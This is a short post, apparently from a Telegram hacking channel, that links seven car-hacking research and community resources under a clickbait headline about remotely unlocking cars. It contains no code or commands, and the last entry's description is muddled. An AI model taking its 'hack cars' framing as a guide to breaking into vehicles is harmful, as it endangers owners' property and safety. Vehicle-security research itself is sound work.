โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–


๐Ÿฆ‘WANNA TO HACK CARS LIKE FATE&FURIOUS, Remontly, unlocking ...
T.me/UndercOdeTesting

1) OpenGarages - Provides public access, documentation and tools necessary to understand today's modern vehicle systems.
> http://opengarages.org/index.php/Main_Page

2) DEFCON Car Hacking Village - Car Hacking exercises from DEFCON 24.
> http://www.carhackingvillage.com/

3) canbushack: Hack Your Car - course on Vehicle Hacking methodology.
> http://www.canbushack.com/blog/index.php

4) OWASP Internet of Things Project - OWASP's project to secure IoT, from cars to medical devices and beyond.
> https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=Community

5) I Am The Cavalry - Global grassroots (eg. volunteer) initiative focused on the intersection of security and human life/public safety issues, such as cars. Participation from security researchers, OEMs, Tier 1s, and many others. Published Automotive 5-Star Cyber Safety Framework.
> https://www.iamthecavalry.org/

6) Carloop Community - Community of people interested in car hacking and connecting vehicles to the cloud.
> https://community.carloop.io/


7) Python Security - A website for brows in and buying python-integrated cars having certain vehicular security features.
> http://www.pythoncarsecurity.com/


Written by UNDERCODE
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–